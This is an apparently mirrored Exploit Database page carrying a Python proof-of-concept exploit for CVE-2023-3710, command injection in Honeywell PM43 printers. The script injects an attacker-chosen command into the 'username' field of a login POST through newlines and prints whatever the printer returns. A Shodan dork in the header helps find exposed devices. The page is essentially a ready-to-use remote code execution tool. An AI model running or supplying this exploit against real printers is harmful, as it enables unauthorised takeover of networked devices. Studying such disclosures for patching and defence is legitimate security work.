Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)

• Exploit Database
• 42 阅读

• 作者： ByteHunter
  日期： 2024-03-14
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51885/

• #- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
  #- Shodan Dork: http.title:PM43 , PM43
  #- Exploit Author: ByteHunter
  #- Email: 0xByteHunter@proton.me
  #- Frimware Version: versions prior to P10.19.050004
  #- Tested on: P10.17.019667
  #- CVE : CVE-2023-3710
  
  
  import requests
  import argparse
  
  BLUE = '\033[94m'
  YELLOW = '\033[93m'
  RESET = '\033[0m'
  
  def banner():
  banner = """
  ╔════════════════════════════════════════════════╗
  CVE-2023-3710 
  Command Injection in Honeywell PM43 Printers
  Author: ByteHunter
  ╚════════════════════════════════════════════════╝
  """
  print(YELLOW + banner + RESET)
  
  
  def run_command(url, command):
  full_url = f"{url}/loadfile.lp?pageid=Configure"
  payload = {
  'username': f'hunt\n{command}\n',
  'userpassword': 'admin12345admin!!'
  }
  try:
  response = requests.post(full_url, data=payload, verify=False)
  response_text = response.text
  html_start_index = response_text.find('<html>')
  if html_start_index != -1:
  return response_text[:html_start_index]
  else:
  return response_text
  except requests.exceptions.RequestException as e:
  return f"Error: {e}"
  
  def main():
  parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
  parser.add_argument('--url', dest='url', help='Target URL', required=True)
  parser.add_argument('--run', dest='command', help='Command to execute', required=True)
  
  args = parser.parse_args()
  
  response = run_command(args.url, args.command)
  print(f"{BLUE}{response}{RESET}")
  
  if __name__ == "__main__":
  banner()
  main()